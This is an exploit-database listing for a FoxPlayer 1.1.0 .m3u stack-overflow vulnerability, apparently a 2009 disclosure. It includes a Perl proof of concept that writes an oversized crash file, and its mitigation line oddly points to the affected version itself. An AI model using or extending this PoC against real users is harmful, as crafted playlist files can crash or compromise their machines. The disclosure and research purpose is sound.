header-logo
Suggest Exploit
vendor:
Fox Player
by:
opt!x hacker
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Fox Player
Affected Version From: 1.1.0
Affected Version To: 1.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:fox_media_player:fox_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

FoxPlayer 1.1.0 (m3u) local stack overlow POC

FoxPlayer 1.1.0 is vulnerable to a local stack overflow vulnerability. The vulnerability is caused due to a boundary error when handling specially crafted .m3u files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .m3u file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of FoxPlayer 1.1.0
Source

Exploit-DB raw data:

#!/usr/bin/perl
# FoxPlayer 1.1.0 (m3u) local stack overlow POC
#finded by opt!x hacker  <optix@9.cn>
#download : http://files.brothersoft.com/regnow/fox-player-setup.exe
my $header="#M3u";
my $crash="A" x 11500;
my $poc=$crash;
open(myfile,'>>AIDI.m3u');
print myfile $poc;

# milw0rm.com [2009-08-07]

Navigation

Suggest Exploit

Services By CQR